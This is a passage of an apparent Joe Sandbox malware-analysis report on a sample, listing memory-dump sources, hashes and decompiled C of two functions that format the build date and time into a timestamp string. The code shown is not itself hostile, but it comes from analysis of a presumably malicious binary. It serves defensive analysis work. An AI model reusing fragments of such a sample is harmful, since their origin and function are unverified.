Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 794eb824bc3f85c85fe80087a77161ec7a4fdd73bd2205f64fb6a3c99af27109
Instruction ID: 65bd4a6d90a4d71d0a5b8f8f665f774eff48743d9c2ee474c8fc389f5f422563
Opcode Fuzzy Hash: 794eb824bc3f85c85fe80087a77161ec7a4fdd73bd2205f64fb6a3c99af27109
Instruction Fuzzy Hash: 5AA18E71A097018FC710DF69E880A6BB7E9FFC9344F48492EF88A97315D771D9058BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00D9B3D0 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c941f9aa65a769e61bc306495e0a75cff81fdd72925cb08c56a553e12ffd9a8
Instruction ID: 811c1099cce6650d24e4bb94fc9b6dcf17a2a490b9e4b0b579b300ad58c1befc
Opcode Fuzzy Hash: 8c941f9aa65a769e61bc306495e0a75cff81fdd72925cb08c56a553e12ffd9a8
Instruction Fuzzy Hash: DB618E31A007098BDF60DF65E980BBBB7B5FF04760F1A815AEC45AB251E7B4D900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D9CB40 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d0c4b6925cf38ebedb56036eb2179ea84281badcee3ccaacc1e3c87e2bcd3e
Instruction ID: 82c3960a768961a3babf57fd70d209d3d93a0e504b509c0ed60f7156bf5906d4
Opcode Fuzzy Hash: 47d0c4b6925cf38ebedb56036eb2179ea84281badcee3ccaacc1e3c87e2bcd3e
Instruction Fuzzy Hash: 9A51D63020D3A10ACB2ACF38C49453FBBE6BE8D99576945BFD496CE443E126D24BC781

Uniqueness

Uniqueness Score: -1.00%

Function 00D98E50 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b63d64401bd7e6c0b9e96cbe20f5ac7b232a30cab2b22ebf5df1188a7b10d86
Instruction ID: 42680b47b4eac14db3fe8ed77d613bbf55075f5040dbf69b4a2296fd9d079358
Opcode Fuzzy Hash: 1b63d64401bd7e6c0b9e96cbe20f5ac7b232a30cab2b22ebf5df1188a7b10d86
Instruction Fuzzy Hash: 7821D341E1A6A84BDB00593EC890782BFC1C792729F2CD3F0E8588FBCED614A409C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 00E939AB Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858e7b9b8f89abda53e995bf705560342153d45e2927cfa6cabf3195b3abe9c3
Instruction ID: decf18d7665baee233cca1cd9b378799c5b374882933b9ba8e56ce5fcafbbdbb
Opcode Fuzzy Hash: 858e7b9b8f89abda53e995bf705560342153d45e2927cfa6cabf3195b3abe9c3
Instruction Fuzzy Hash: C6E08C32A11268EBCF16DB98C905A8AF3FCEB84B41B510096B511E3100C2B0DF00CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00D91360 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 270
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00D91360(void* __ebx, void* __edi, void* __esi) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v28;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				void* _t132;
				void* _t153;
				void* _t248;
				void* _t249;

				_t249 = __esi;
				_t248 = __edi;
				_t153 = __ebx;
				_v44 =  *((intOrPtr*)(7 + "Feb  4 2022"));
				_t3 = (1 << 3) + "Feb  4 2022"; // 0x20206265
				_v43 =  *_t3;
				_t5 = 9 + "Feb  4 2022"; // 0x20206265
				_v42 =  *_t5;
				_t7 = 0xa + "Feb  4 2022"; // 0x20206265
				_v41 =  *_t7;
				_t9 = 0 + "Feb  4 2022"; // 0x20206265
				if( *_t9 == 0x4f) {
					L4:
					_v5 = 0x31;
				} else {
					_t10 = 0 + "Feb  4 2022"; // 0x20206265
					if( *_t10 == 0x4e) {
						goto L4;
					} else {
						_t11 = 0 + "Feb  4 2022"; // 0x20206265
						if( *_t11 == 0x44) {
							goto L4;
						} else {
							_v5 = 0x30;
						}
					}
				}
				_v40 = _v5;
				if( *((char*)(0 + "Feb  4 2022")) != 0x4a) {
					L9:
					__eflags =  *((char*)(0 + "Feb  4 2022")) - 0x46;
					if(__eflags != 0) {
						__eflags =  *((char*)(0 + "Feb  4 2022")) - 0x4d;
						if( *((char*)(0 + "Feb  4 2022")) != 0x4d) {
							L15:
							__eflags =  *((char*)(0 + "Feb  4 2022")) - 0x41;
							if( *((char*)(0 + "Feb  4 2022")) != 0x41) {
								L18:
								_t29 = 0 + "Feb  4 2022"; // 0x20206265
								__eflags =  *_t29 - 0x4d;
								if( *_t29 != 0x4d) {
									L22:
									__eflags =  *((char*)(0 + "Feb  4 2022")) - 0x4a;
									if( *((char*)(0 + "Feb  4 2022")) != 0x4a) {
										L26:
										__eflags =  *((char*)(0 + "Feb  4 2022")) - 0x4a;
										if( *((char*)(0 + "Feb  4 2022")) != 0x4a) {
											L30:
											__eflags =  *((char*)(0 + "Feb  4 2022")) - 0x41;
											if( *((char*)(0 + "Feb  4 2022")) != 0x41) {
												L33:
												_t44 = 0 + "Feb  4 2022"; // 0x20206265
												__eflags =  *_t44 - 0x53;
												if(__eflags != 0) {
													_t46 = 0 + "Feb  4 2022"; // 0x20206265
													__eflags =  *_t46 - 0x4f;
													if(__eflags != 0) {
														_t48 = 0 + "Feb  4 2022"; // 0x20206265
														__eflags =  *_t48 - 0x4e;
														if(__eflags != 0) {
															_t50 = 0 + "Feb  4 2022"; // 0x20206265
															__eflags =  *_t50 - 0x44;
															if(__eflags != 0) {
																_v6 = 0x3f;
															} else {
																_v6 = 0x32;
															}
															_v7 = _v6;
														} else {
															_v7 = 0x31;
														}
														_v8 = _v7;
													} else {
														_v8 = 0x30;
													}
													_v9 = _v8;
												} else {
													_v9 = 0x39;
												}
												_v10 = _v9;
											} else {
												_t42 = (1 << 0) + "Feb  4 2022"; // 0x20206265
												__eflags =  *_t42 - 0x75;
												if(__eflags != 0) {
													goto L33;
												} else {
													_v10 = 0x38;
												}
											}
											_v11 = _v10;
										} else {
											_t38 = (1 << 0) + "Feb  4 2022"; // 0x20206265
											__eflags =  *_t38 - 0x75;
											if( *_t38 != 0x75) {
												goto L30;
											} else {
												_t39 = (1 << 1) + "Feb  4 2022"; // 0x20206265
												__eflags =  *_t39 - 0x6c;
												if(__eflags != 0) {
													goto L30;
												} else {
													_v11 = 0x37;
												}
											}
										}
										_v12 = _v11;
									} else {
										_t34 = (1 << 0) + "Feb  4 2022"; // 0x20206265
										__eflags =  *_t34 - 0x75;
										if( *_t34 != 0x75) {
											goto L26;
										} else {
											_t35 = (1 << 1) + "Feb  4 2022"; // 0x20206265
											__eflags =  *_t35 - 0x6e;
											if(__eflags != 0) {
												goto L26;
											} else {
												_v12 = 0x36;
											}
										}
									}
									_v13 = _v12;
								} else {
									_t30 = (1 << 0) + "Feb  4 2022"; // 0x20206265
									__eflags =  *_t30 - 0x61;
									if( *_t30 != 0x61) {
										goto L22;
									} else {
										_t31 = (1 << 1) + "Feb  4 2022"; // 0x20206265
										__eflags =  *_t31 - 0x79;
										if(__eflags != 0) {
											goto L22;
										} else {
											_v13 = 0x35;
										}
									}
								}
								_v14 = _v13;
							} else {
								_t27 = (1 << 0) + "Feb  4 2022"; // 0x20206265
								__eflags =  *_t27 - 0x70;
								if(__eflags != 0) {
									goto L18;
								} else {
									_v14 = 0x34;
								}
							}
							_v15 = _v14;
						} else {
							_t23 = (1 << 0) + "Feb  4 2022"; // 0x20206265
							__eflags =  *_t23 - 0x61;
							if( *_t23 != 0x61) {
								goto L15;
							} else {
								_t24 = (1 << 1) + "Feb  4 2022"; // 0x20206265
								__eflags =  *_t24 - 0x72;
								if(__eflags != 0) {
									goto L15;
								} else {
									_v15 = 0x33;
								}
							}
						}
						_v16 = _v15;
					} else {
						_v16 = 0x32;
					}
					_v17 = _v16;
				} else {
					_t17 = (1 << 0) + "Feb  4 2022"; // 0x20206265
					if( *_t17 != 0x61) {
						goto L9;
					} else {
						_t18 = (1 << 1) + "Feb  4 2022"; // 0x20206265
						if( *_t18 != 0x6e) {
							goto L9;
						} else {
							_v17 = 0x31;
						}
					}
				}
				_v39 = _v17;
				_t77 = (1 << 2) + "Feb  4 2022"; // 0x20206265
				if( *_t77 < 0x30) {
					_v18 = 0x30;
				} else {
					_t78 = (1 << 2) + "Feb  4 2022"; // 0x20206265
					_v18 =  *_t78;
				}
				_v38 = _v18;
				_t83 = 5 + "Feb  4 2022"; // 0x20206265
				_v37 =  *_t83;
				_t85 = 0 + "11:51:43"; // 0x31353a31
				_v36 =  *_t85;
				_t87 = (1 << 0) + "11:51:43"; // 0x31353a31
				_v35 =  *_t87;
				_t89 = 3 + "11:51:43"; // 0x31353a31
				_v34 =  *_t89;
				_t91 = (1 << 2) + "11:51:43"; // 0x31353a31
				_v33 =  *_t91;
				_t93 = 6 + "11:51:43"; // 0x31353a31
				_v32 =  *_t93;
				_t95 = 7 + "11:51:43"; // 0x31353a31
				_v31 =  *_t95;
				_t132 = E00E25550( &_v19);
				E00E62130(_t153, 0xedd7c0, _t248, _t249, 7,  *((intOrPtr*)(E00E262F0( &_v28,  &_v44,  &_v30))),  *((intOrPtr*)(_t134 + 4)), _t132);
				return E00E76B0B(0xedd7c0, 7, 0xea4580);
			}

0x00d91360
0x00d91360
0x00d91360
0x00d91374
0x00d9137f
0x00d91385
0x00d91390
0x00d91396
0x00d913a1
0x00d913a7
0x00d913b2
0x00d913bc
0x00d913ec
0x00d913ec
0x00d913be
0x00d913c6
0x00d913d0
0x00000000
0x00d913d2
0x00d913da
0x00d913e4
0x00000000
0x00d913e6
0x00d913e6
0x00d913e6
0x00d913e4
0x00d913d0
0x00d913f3
0x00d91408
0x00d9143a
0x00d91449
0x00d9144c
0x00d91466
0x00d91469
0x00d9149b
0x00d914aa
0x00d914ad
0x00d914cc
0x00d914d4
0x00d914db
0x00d914de
0x00d91510
0x00d9151f
0x00d91522
0x00d91554
0x00d91563
0x00d91566
0x00d91598
0x00d915a7
0x00d915aa
0x00d915c9
0x00d915d1
0x00d915d8
0x00d915db
0x00d915eb
0x00d915f2
0x00d915f5
0x00d91605
0x00d9160c
0x00d9160f
0x00d9161f
0x00d91626
0x00d91629
0x00d91631
0x00d9162b
0x00d9162b
0x00d9162b
0x00d91638
0x00d91611
0x00d91611
0x00d91611
0x00d9163e
0x00d915f7
0x00d915f7
0x00d915f7
0x00d91644
0x00d915dd
0x00d915dd
0x00d915dd
0x00d9164a
0x00d915ac
0x00d915b4
0x00d915bb
0x00d915be
0x00000000
0x00d915c0
0x00d915c0
0x00d915c0
0x00d915be
0x00d91650
0x00d91568
0x00d91570
0x00d91577
0x00d9157a
0x00000000
0x00d9157c
0x00d91583
0x00d9158a
0x00d9158d
0x00000000
0x00d9158f
0x00d9158f
0x00d9158f
0x00d9158d
0x00d9157a
0x00d91656
0x00d91524
0x00d9152c
0x00d91533
0x00d91536
0x00000000
0x00d91538
0x00d9153f
0x00d91546
0x00d91549
0x00000000
0x00d9154b
0x00d9154b
0x00d9154b
0x00d91549
0x00d91536
0x00d9165c
0x00d914e0
0x00d914e8
0x00d914ef
0x00d914f2
0x00000000
0x00d914f4
0x00d914fb
0x00d91502
0x00d91505
0x00000000
0x00d91507
0x00d91507
0x00d91507
0x00d91505
0x00d914f2
0x00d91662
0x00d914af
0x00d914b7
0x00d914be
0x00d914c1
0x00000000
0x00d914c3
0x00d914c3
0x00d914c3
0x00d914c1
0x00d91668
0x00d9146b
0x00d91473
0x00d9147a
0x00d9147d
0x00000000
0x00d9147f
0x00d91486
0x00d9148d
0x00d91490
0x00000000
0x00d91492
0x00d91492
0x00d91492
0x00d91490
0x00d9147d
0x00d9166e
0x00d9144e
0x00d9144e
0x00d9144e
0x00d91674
0x00d9140a
0x00d91412
0x00d9141c
0x00000000
0x00d9141e
0x00d91425
0x00d9142f
0x00000000
0x00d91431
0x00d91431
0x00d91431
0x00d9142f
0x00d9141c
0x00d9167a
0x00d91685
0x00d9168f
0x00d916a4
0x00d91691
0x00d91699
0x00d9169f
0x00d9169f
0x00d916ab
0x00d916b6
0x00d916bc
0x00d916c7
0x00d916cd
0x00d916d8
0x00d916de
0x00d916e9
0x00d916ef
0x00d916fa
0x00d91700
0x00d9170b
0x00d91711
0x00d9171c
0x00d91722
0x00d91728
0x00d9174a
0x00d9175f

APIs

_Smanip.LIBCPMTD ref: 00D91739

Strings

0, xrefs: 00D916A4
8, xrefs: 00D915C0
?, xrefs: 00D91631
7, xrefs: 00D9158F
1, xrefs: 00D913EC
3, xrefs: 00D91492
20220204115143, xrefs: 00D91745
9, xrefs: 00D915DD
0, xrefs: 00D915F7
2, xrefs: 00D9144E
1, xrefs: 00D91611
5, xrefs: 00D91507
4, xrefs: 00D914C3
1, xrefs: 00D91431
6, xrefs: 00D9154B

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: Smanip
String ID: 0$0$1$1$1$2$20220204115143$3$4$5$6$7$8$9$?
API String ID: 2140389272-2569782291
Opcode ID: 062734e64f73fffa2e2b22be75ec04094c5e09ea3191d77ce139016d29f8b98c
Instruction ID: e35ff03417db26c49606fcf80accb979bf994b266bac2044dbecff6ef7a550b3
Opcode Fuzzy Hash: 062734e64f73fffa2e2b22be75ec04094c5e09ea3191d77ce139016d29f8b98c
Instruction Fuzzy Hash: 9BB1C85590C1D659DF0A86F841A43FFAFB65BA3340F5C90EAC0926F7C7C1AACA85C361

Uniqueness

Uniqueness Score: -1.00%

Function 00D91D50 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 270
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00D91D50(void* __ebx, void* __edi, void* __esi) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v28;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				void* _t132;
				void* _t153;
				void* _t248;
				void* _t249;

				_t249 = __esi;
				_t248 = __edi;
				_t153 = __ebx;
				_v44 =  *((intOrPtr*)(7 + "Feb  4 2022"));
				_t3 = (1 << 3) + "Feb  4 2022"; // 0x20206265
				_v43 =  *_t3;
				_t5 = 9 + "Feb  4 2022"; // 0x20206265
				_v42 =  *_t5;
				_t7 = 0xa + "Feb  4 2022"; // 0x20206265
				_v41 =  *_t7;
				_t9 = 0 + "Feb  4 2022"; // 0x20206265
				if( *_t9 == 0x4f) {
					L4:
					_v5 = 0x31;
				} else {
					_t10 = 0 + "Feb  4 2022"; // 0x20206265
					if( *_t10 == 0x4e) {
						goto L4;
					} else {
						_t11 = 0 + "Feb  4 2022"; // 0x20206265
						if( *_t11 == 0x44) {
							goto L4;
						} else {
							_v5 = 0x30;
						}
					}
				}
				_v40 = _v5;
				if( *((char*)(0 + "Feb  4 2022")) != 0x4a) {
					L9:
					__eflags =  *((char*)(0 + "Feb  4 2022")) - 0x46;
					if(__eflags != 0) {
						__eflags =  *((char*)(0 + "Feb  4 2022")) - 0x4d;
						if( *((char*)(0 + "Feb  4 2022")) != 0x4d) {
							L15:
							__eflags =  *((char*)(0 + "Feb  4 2022")) - 0x41;
							if( *((char*)(0 + "Feb  4 2022")) != 0x41) {
								L18:
								_t29 = 0 + "Feb  4 2022"; // 0x20206265
								__eflags =  *_t29 - 0x4d;
								if( *_t29 != 0x4d) {
									L22:
									__eflags =  *((char*)(0 + "Feb  4 2022")) - 0x4a;
									if( *((char*)(0 + "Feb  4 2022")) != 0x4a) {
										L26:
										__eflags =  *((char*)(0 + "Feb  4 2022")) - 0x4a;
										if( *((char*)(0 + "Feb  4 2022")) != 0x4a) {
											L30:
											__eflags =  *((char*)(0 + "Feb  4 2022")) - 0x41;
											if( *((char*)(0 + "Feb  4 2022")) != 0x41) {
												L33:
												_t44 = 0 + "Feb  4 2022"; // 0x20206265
												__eflags =  *_t44 - 0x53;
												if(__eflags != 0) {
													_t46 = 0 + "Feb  4 2022"; // 0x20206265
													__eflags =  *_t46 - 0x4f;
													if(__eflags != 0) {
														_t48 = 0 + "Feb  4 2022"; // 0x20206265
														__eflags =  *_t48 - 0x4e;
														if(__eflags != 0) {
															_t50 = 0 + "Feb  4 2022"; // 0x20206265
															__eflags =  *_t50 - 0x44;
															if(__eflags != 0) {
																_v6 = 0x3f;
															} else {
																_v6 = 0x32;
															}
															_v7 = _v6;
														} else {
															_v7 = 0x31;
														}
														_v8 = _v7;
													} else {
														_v8 = 0x30;
													}
													_v9 = _v8;
												} else {
													_v9 = 0x39;
												}
												_v10 = _v9;
											} else {
												_t42 = (1 << 0) + "Feb  4 2022"; // 0x20206265
												__eflags =  *_t42 - 0x75;
												if(__eflags != 0) {
													goto L33;
												} else {
													_v10 = 0x38;
												}
											}
											_v11 = _v10;
										} else {
											_t38 = (1 << 0) + "Feb  4 2022"; // 0x20206265
											__eflags =  *_t38 - 0x75;
											if( *_t38 != 0x75) {
												goto L30;
											} else {
												_t39 = (1 << 1) + "Feb  4 2022"; // 0x20206265
												__eflags =  *_t39 - 0x6c;
												if(__eflags != 0) {
													goto L30;
												} else {
													_v11 = 0x37;
												}
											}
										}
										_v12 = _v11;
									} else {
										_t34 = (1 << 0) + "Feb  4 2022"; // 0x20206265
										__eflags =  *_t34 - 0x75;
										if( *_t34 != 0x75) {
											goto L26;
										} else {
											_t35 = (1 << 1) + "Feb  4 2022"; // 0x20206265
											__eflags =  *_t35 - 0x6e;
											if(__eflags != 0) {
												goto L26;
											} else {
												_v12 = 0x36;
											}
										}
									}
									_v13 = _v12;
								} else {
									_t30 = (1 << 0) + "Feb  4 2022"; // 0x20206265
									__eflags =  *_t30 - 0x61;
									if( *_t30 != 0x61) {
										goto L22;
									} else {
										_t31 = (1 << 1) + "Feb  4 2022"; // 0x20206265
										__eflags =  *_t31 - 0x79;
										if(__eflags != 0) {
											goto L22;
										} else {
											_v13 = 0x35;
										}
									}
								}
								_v14 = _v13;
							} else {
								_t27 = (1 << 0) + "Feb  4 2022"; // 0x20206265
								__eflags =  *_t27 - 0x70;
								if(__eflags != 0) {
									goto L18;
								} else {
									_v14 = 0x34;
								}
							}
							_v15 = _v14;
						} else {
							_t23 = (1 << 0) + "Feb  4 2022"; // 0x20206265
							__eflags =  *_t23 - 0x61;
							if( *_t23 != 0x61) {
								goto L15;
							} else {
								_t24 = (1 << 1) + "Feb  4 2022"; // 0x20206265
								__eflags =  *_t24 - 0x72;
								if(__eflags != 0) {
									goto L15;
								} else {
									_v15 = 0x33;
								}
							}
						}
						_v16 = _v15;
					} else {
						_v16 = 0x32;
					}
					_v17 = _v16;
				} else {
					_t17 = (1 << 0) + "Feb  4 2022"; // 0x20206265
					if( *_t17 != 0x61) {
						goto L9;
					} else {
						_t18 = (1 << 1) + "Feb  4 2022"; // 0x20206265
						if( *_t18 != 0x6e) {
							goto L9;
						} else {
							_v17 = 0x31;
						}
					}
				}
				_v39 = _v17;
				_t77 = (1 << 2) + "Feb  4 2022"; // 0x20206265
				if( *_t77 < 0x30) {
					_v18 = 0x30;
				} else {
					_t78 = (1 << 2) + "Feb  4 2022"; // 0x20206265
					_v18 =  *_t78;
				}
				_v38 = _v18;
				_t83 = 5 + "Feb  4 2022"; // 0x20206265
				_v37 =  *_t83;
				_t85 = 0 + "11:51:54"; // 0x31353a31
				_v36 =  *_t85;
				_t87 = (1 << 0) + "11:51:54"; // 0x31353a31
				_v35 =  *_t87;
				_t89 = 3 + "11:51:54"; // 0x31353a31
				_v34 =  *_t89;
				_t91 = (1 << 2) + "11:51:54"; // 0x31353a31
				_v33 =  *_t91;
				_t93 = 6 + "11:51:54"; // 0x31353a31
				_v32 =  *_t93;
				_t95 = 7 + "11:51:54"; // 0x31353a31
				_v31 =  *_t95;
				_t132 = E00E25550( &_v19);
				E00E62130(_t153, 0xede088, _t248, _t249, 7,  *((intOrPtr*)(E00E262F0( &_v28,  &_v44,  &_v30))),  *((intOrPtr*)(_t134 + 4)), _t132);
				return E00E76B0B(0xede088, 7, 0xea4790);
			}

0x00d91d50
0x00d91d50
0x00d91d50
0x00d91d64
0x00d91d6f
0x00d91d75
0x00d91d80
0x00d91d86
0x00d91d91
0x00d91d97
0x00d91da2
0x00d91dac
0x00d91ddc
0x00d91ddc
0x00d91dae
0x00d91db6
0x00d91dc0
0x00000000
0x00d91dc2
0x00d91dca
0x00d91dd4
0x00000000
0x00d91dd6
0x00d91dd6
0x00d91dd6
0x00d91dd4
0x00d91dc0
0x00d91de3
0x00d91df8
0x00d91e2a
0x00d91e39
0x00d91e3c
0x00d91e56
0x00d91e59
0x00d91e8b
0x00d91e9a
0x00d91e9d
0x00d91ebc
0x00d91ec4
0x00d91ecb
0x00d91ece
0x00d91f00
0x00d91f0f
0x00d91f12
0x00d91f44
0x00d91f53
0x00d91f56
0x00d91f88
0x00d91f97
0x00d91f9a
0x00d91fb9
0x00d91fc1
0x00d91fc8
0x00d91fcb
0x00d91fdb
0x00d91fe2
0x00d91fe5
0x00d91ff5
0x00d91ffc
0x00d91fff
0x00d9200f
0x00d92016
0x00d92019
0x00d92021
0x00d9201b
0x00d9201b
0x00d9201b
0x00d92028
0x00d92001
0x00d92001
0x00d92001
0x00d9202e
0x00d91fe7
0x00d91fe7
0x00d91fe7
0x00d92034
0x00d91fcd
0x00d91fcd
0x00d91fcd
0x00d9203a
0x00d91f9c
0x00d91fa4
0x00d91fab
0x00d91fae
0x00000000
0x00d91fb0
0x00d91fb0
0x00d91fb0
0x00d91fae
0x00d92040
0x00d91f58
0x00d91f60
0x00d91f67
0x00d91f6a
0x00000000
0x00d91f6c
0x00d91f73
0x00d91f7a
0x00d91f7d
0x00000000
0x00d91f7f
0x00d91f7f
0x00d91f7f
0x00d91f7d
0x00d91f6a
0x00d92046
0x00d91f14
0x00d91f1c
0x00d91f23
0x00d91f26
0x00000000
0x00d91f28
0x00d91f2f
0x00d91f36
0x00d91f39
0x00000000
0x00d91f3b
0x00d91f3b
0x00d91f3b
0x00d91f39
0x00d91f26
0x00d9204c
0x00d91ed0
0x00d91ed8
0x00d91edf
0x00d91ee2
0x00000000
0x00d91ee4
0x00d91eeb
0x00d91ef2
0x00d91ef5
0x00000000
0x00d91ef7
0x00d91ef7
0x00d91ef7
0x00d91ef5
0x00d91ee2
0x00d92052
0x00d91e9f
0x00d91ea7
0x00d91eae
0x00d91eb1
0x00000000
0x00d91eb3
0x00d91eb3
0x00d91eb3
0x00d91eb1
0x00d92058
0x00d91e5b
0x00d91e63
0x00d91e6a
0x00d91e6d
0x00000000
0x00d91e6f
0x00d91e76
0x00d91e7d
0x00d91e80
0x00000000
0x00d91e82
0x00d91e82
0x00d91e82
0x00d91e80
0x00d91e6d
0x00d9205e
0x00d91e3e
0x00d91e3e
0x00d91e3e
0x00d92064
0x00d91dfa
0x00d91e02
0x00d91e0c
0x00000000
0x00d91e0e
0x00d91e15
0x00d91e1f
0x00000000
0x00d91e21
0x00d91e21
0x00d91e21
0x00d91e1f
0x00d91e0c
0x00d9206a
0x00d92075
0x00d9207f
0x00d92094
0x00d92081
0x00d92089
0x00d9208f
0x00d9208f
0x00d9209b
0x00d920a6
0x00d920ac
0x00d920b7
0x00d920bd
0x00d920c8
0x00d920ce
0x00d920d9
0x00d920df
0x00d920ea
0x00d920f0
0x00d920fb
0x00d92101
0x00d9210c
0x00d92112
0x00d92118
0x00d9213a
0x00d9214f

APIs

_Smanip.LIBCPMTD ref: 00D92129

Strings

1, xrefs: 00D92001
2, xrefs: 00D91E3E
?, xrefs: 00D92021
1, xrefs: 00D91E21
0, xrefs: 00D92094
5, xrefs: 00D91EF7
4, xrefs: 00D91EB3
7, xrefs: 00D91F7F
8, xrefs: 00D91FB0
9, xrefs: 00D91FCD
1, xrefs: 00D91DDC
3, xrefs: 00D91E82
20220204115154, xrefs: 00D92135
6, xrefs: 00D91F3B
0, xrefs: 00D91FE7

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: Smanip
String ID: 0$0$1$1$1$2$20220204115154$3$4$5$6$7$8$9$?
API String ID: 2140389272-1458245305
Opcode ID: fe9a0a5e48d8e06275b5b9f05d132e4e16e8902de957c61f234be3b225150414
